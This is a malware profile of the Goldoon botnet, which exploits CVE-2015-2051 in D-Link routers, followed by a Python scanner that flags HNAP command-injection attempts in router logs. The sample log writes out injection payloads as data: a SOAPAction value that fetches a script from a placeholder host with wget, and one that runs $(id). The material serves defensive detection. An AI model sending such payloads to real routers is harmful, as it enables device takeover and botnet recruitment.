| Goldoon | |
| --- | --- |
| Type of Malware | Botnet |
| Date of initial activity | April 2024 |
| Motivation | Trend Micro reported observing compromised routers being used for a range of purposes, including Secure Shell (SSH) brute forcing, pharmaceutical spam, acting as server message block (SMB) reflectors in NTLMv2 hash relay attacks, proxying stolen credentials on phishing sites, multi-purpose proxying, cryptocurrency mining, and sending spear-phishing emails. |
| Attack Vectors | Exploitation of CVE-2015-2051 |
| Tools | BAT/Agent.G!tr.dldr |
| Targeted System | Linux |
Overview
Researchers have identified a botnet named Goldoon that exploits a long-standing vulnerability in unpatched D-Link routers. The flaw, CVE-2015-2051, has a low attack complexity yet is rated critical because it allows remote code execution on the affected hardware, according to a report by cybersecurity firm Fortinet. “Once attackers successfully exploit this vulnerability, they can enlist compromised devices into their botnet for launching subsequent attacks,” Fortinet stated. The botnet takes its name from a component called goldoon.server found in the spreading malware. Goldoon gathers information about the systems it infects and is used by its operators to launch distributed denial-of-service (DDoS) attacks, a typical botnet function.

D-Link addressed the vulnerability with a firmware update released in the first half of 2015. Unpatched D-Link hardware nevertheless remains widespread and has recently drawn scrutiny from researchers and the U.S. Cybersecurity and Infrastructure Security Agency (CISA); in April 2024 the agency highlighted ongoing exploitation of older D-Link devices by threat actors.
Targets
D-Link routers with a nearly decade-old critical security flaw (CVE-2015-2051)
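The profile above names the entry point (CVE-2015-2051) but not what exploitation looks like on the wire, which is what a defender needs to spot it. The following is an added example written for this page, not code from Fortinet, from the Goldoon operators, or from D-Link: a small log scanner that flags requests matching the shape of a CVE-2015-2051 attempt. The detail that the flaw is reached through the router's HNAP interface, via a GetDeviceSettings action whose SOAPAction header value is passed to a shell, comes from the public CVE description, not from this page. The log line format is assumed (no real product logs this way), the sample lines are constructed, and the 192.0.2.x client addresses are documentation-range placeholders.

```python
import re
from typing import Dict, List, Optional

# Constructed sample log. One line per HTTP request to the router's management
# interface, in an assumed (made-up) format:
#   <client_ip> <METHOD> <path> soapaction="<SOAPAction header value>"
# The 192.0.2.x addresses are documentation-range placeholders.
SAMPLE_LOG = """\
192.0.2.10 POST /HNAP1/ soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings"
192.0.2.11 GET /HNAP1/ soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp; wget http://example.invalid/x.sh`"
192.0.2.12 POST /HNAP1/ soapaction="http://purenetworks.com/HNAP1/Login"
192.0.2.13 POST /HNAP1/ soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings/$(id)"
192.0.2.14 GET /index.html soapaction=""
"""

# Parser for the assumed log format above.
LINE_RE = re.compile(
    r'^(?P<ip>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+soapaction="(?P<soap>.*)"$'
)

# Shell metacharacters that have no place in a SOAPAction URI: backticks and
# $( ) are command substitution, while ; | & chain or background commands.
SHELL_META_RE = re.compile(r"[`;|&]|\$\(")

# The legitimate HNAP action URI that CVE-2015-2051 exploitation piggybacks on.
GET_DEVICE_SETTINGS = "http://purenetworks.com/HNAP1/GetDeviceSettings"


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one assumed-format log line into its fields, or None if malformed."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def is_hnap_injection(rec: Dict[str, str]) -> bool:
    """True when the request hits the HNAP endpoint and its SOAPAction value is
    GetDeviceSettings followed by shell metacharacters, i.e. the shape of a
    CVE-2015-2051 command-injection attempt. Ordinary HNAP traffic, including a
    plain GetDeviceSettings call, is not flagged."""
    if not rec["path"].startswith("/HNAP1"):
        return False
    soap = rec["soap"]
    if not soap.startswith(GET_DEVICE_SETTINGS):
        return False
    tail = soap[len(GET_DEVICE_SETTINGS):]
    return bool(SHELL_META_RE.search(tail))


def find_hnap_injection(log_text: str) -> List[Dict[str, str]]:
    """Return the parsed records of every line that looks like an injection attempt."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_hnap_injection(rec):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in find_hnap_injection(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['method']} {hit['path']} SOAPAction={hit['soap']!r}")
```

On the constructed sample this flags the two requests whose SOAPAction carries a backtick or $( ) command substitution after GetDeviceSettings and leaves the benign GetDeviceSettings and Login calls alone. Two caveats: the check matches one injection shape and is a tripwire, not a filter, so a device that is still running 2015-era firmware should be updated or replaced rather than merely monitored; and since a router's HNAP interface should not be reachable from the WAN in the first place, confirming that it is not is the more useful check for devices that can no longer be patched.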